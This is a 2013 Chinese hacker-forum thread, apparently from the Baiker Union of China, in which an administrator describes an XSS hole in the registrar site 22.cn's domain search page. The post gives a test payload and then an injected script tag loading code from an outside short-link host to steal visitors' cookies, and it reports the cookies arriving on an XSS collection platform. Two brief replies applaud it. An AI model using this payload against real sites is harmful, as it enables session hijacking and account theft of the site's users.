搜索
查看: 684|回复: 2

爱名网xss

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-6 09:13:00 | 显示全部楼层 |阅读模式
开头我还是那句话,本人是手机党,测试都是在可爱的uc浏览器上进行的,不能审查元素,不能看源代码,请各位客观见谅。
这次是爱名网的xsswww.22.cn漏洞地址:http://www.22.cn/DomainReg.aspx

首先在框框里输入输入<script>alert("xss")</script>,果断跳出了框框~然后我们试试能不能盗取cookies

输入<script src=http://x.co/1Ou19></script>然后点查询,后台在查询了,我们等等哦~然后登录xss平台。看到cookies来了~


转载请注明中国白客联盟:www.chinabaiker.com

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
专业回帖 该用户已被删除
发表于 2013-10-6 09:46:17 | 显示全部楼层
没看完~~~~~~ 先顶,好同志
专业回帖 该用户已被删除
发表于 2013-10-6 10:11:19 | 显示全部楼层
支持一下
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表